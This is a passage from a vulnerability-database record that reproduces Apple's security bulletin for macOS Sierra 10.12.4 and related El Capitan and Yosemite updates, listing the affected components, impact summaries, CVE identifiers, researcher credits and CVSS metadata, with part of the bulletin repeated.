macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute 
arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. 
This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. 
This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. 
This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang (@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in a group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. 
This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:52:03", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", 
"CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", "CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", "CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", "CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", "CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2017-08-29T02:52:03", "id": "APPLE:HT207615", "href": 
"https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:57", "description": "# About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nThis document describes the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. 
These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory 
management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: 
John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. 
This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel 
privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute 
arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. 
This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. 
This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code 